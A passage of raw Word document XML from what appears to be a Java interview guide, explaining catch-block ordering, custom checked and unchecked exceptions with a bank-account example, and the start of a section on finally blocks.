    <w:p w14:paraId="4B4D2D6A" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006D1B6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EC22BD9">
          <v:rect id="_x0000_i1627" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4157F" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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654988BE"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MyCustomException extends Exception {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FD889" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B65">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F2CEBE"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F23A18"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2FAB9A37"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6547EE3E"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row new MyCustomException();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BBE8E"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tch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731A14FD"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aught generic Exception");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA43215"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822395B"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atch (MyCustomException e) {   </w:t>
      </w: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Compile-time error if placed after Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF16D8"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System.out.println("Caught MyCustomException");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C64EA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08583602"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B1CABC4"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5F64B27" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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mpile-Time Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE05E9"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nreachable catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for MyCustomException. It is already handled by the catch block for Exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0325A752" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006D1B6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A18F2E2">
          <v:rect id="_x0000_i1628" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5690A8F0" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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rrect Order (Specific to General):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADE938"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y {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8AE48"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row new MyCustomException();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA2EF0E"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catch (MyCustomException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B998F9"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aught MyCustomException"); // </w:t>
      </w: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this will execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E345D"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catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9BBE90"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aught generic Exception");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EA4792"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DC87ACB" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006D1B6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A2A93C7">
          <v:rect id="_x0000_i1629" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B6D8D" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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Priority Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A468FB7"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ore specific exceptions must be caught before general exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100442FD" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006D1B6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7424A9">
          <v:rect id="_x0000_i1630" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A9FC8" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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08"/>
        <w:gridCol w:w="3752"/>
      </w:tblGrid>
      <w:tr w:rsidR="006D1B65" w:rsidRPr="00CE4B95" w14:paraId="41239F52" w14:textId="77777777" w:rsidTr="006712E3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77207426" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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dition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3314D45C" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D1B65" w:rsidRPr="00CE4B95" w14:paraId="192BA26B" w14:textId="77777777" w:rsidTr="006712E3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EA3D4B9"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tch(Exception e) before custom exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E247F12"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Compile-time error (unreachable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D1B65" w:rsidRPr="00CE4B95" w14:paraId="536C3D6A" w14:textId="77777777" w:rsidTr="006712E3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A02A449"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tch(CustomException e) before Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12654DF4" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B65">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Correct (custom block gets executed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C337B2F" w14:textId="69B0B1F1" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="5B3DB760">
          <v:rect id="_x0000_i1631" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB8DB11" w14:textId="77777777" w:rsidR="00AB25FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB25FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc196307686"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you created a custom exception? What is the purpose of that?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w14:paraId="1E515B6D" w14:textId="6E4703CA" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">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es! </w:t>
      </w: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As a Java developer, creating </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>best practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in many real-world scenarios to make error handling more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meaningful</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readable</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reusable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D1B5F" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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824A029">
          <v:rect id="_x0000_i1632" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FDCE3" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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at is a Custom Exception?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49ADFB"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Custom Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a user-defined class that extends Exception or RuntimeException to represent </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application-specific error scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A454E4" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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0212FBE">
          <v:rect id="_x0000_i1633" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33599F72" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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Purpose of Creating a Custom Excep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63"/>
        <w:gridCol w:w="5510"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="5D42BC94" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1046B27B" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0339D8E7" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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AE234D" w:rsidRPr="00CE4B95" w14:paraId="5F89F832" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64496F7A"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aningful error messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="704699DF"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kes your code more readable and understandable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="6479AEFA" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B037D7D"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omain-specific handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FF210C1"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lps separate business logic errors from system exceptions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="1F606D18" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B3A981F"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usable &amp; maintainable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01EA94F0"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be reused across multiple services/modules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="35D218F6" w14:textId="77777777" w:rsidTr="0047397F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5145E426"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Better exception hierarchy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="014E59A7"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lps you classify and group exceptions cleanly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58145F2C" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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43166C4">
          <v:rect id="_x0000_i1634" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093FD11" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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Creating a Checked Custom Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68604619"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InsufficientBalanceException extends Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E0D84"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InsufficientBalanceException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29095207"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uper(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C9E8C"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47B500E"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9BAF1D7" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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Using the Custom Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DCAD42"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BankAccount {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF82E2"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double balance = 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D03FF" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350F3D0E"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withdraw(double amount) throws InsufficientBalanceException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A61FD3"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amount &gt; balance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F9E0C"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row new InsufficientBalanceException("Insufficient funds!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFEF546"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F1439C6"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balance -= amount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9355F"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481728D"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5145A6D" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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6401F67">
          <v:rect id="_x0000_i1635" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDBAD9" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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Unchecked Custom Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D55F9F5"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InvalidUserInputException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6663381E"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InvalidUserInputException(String msg) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076CCA84"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uper(msg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1E7D7"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54824A9"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BB31D1E" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F"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this when you don't want to force the caller to handle the exception explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170EACF" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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501A716">
          <v:rect id="_x0000_i1636" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECB1AF" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234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eal-Time Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69600B" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rNotFoundException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0796404B" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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oductOutOfStockException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2D3CDD" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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validTransactionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484A5EE" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ccessDeniedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE656B" w14:textId="77777777" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ustomValidationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA7BCF" w14:textId="3570E83B" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="03141B88">
          <v:rect id="_x0000_i1637" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177933B" w14:textId="77777777" w:rsidR="00D72440" w:rsidRPr="00CE4B95" w:rsidRDefault="00D72440">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Toc196307687"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of finally block in exception handling?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="51A1D212" w14:textId="11F4DAAF" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234D">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finally block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is an important part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, used to ensure that certain code </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>always runs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, whether an exception occurs or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804E0DE" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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079A68F">
          <v:rect id="_x0000_i1638" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3386CD" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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Purpose of finally Block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C764BB"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finally block is used to write </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
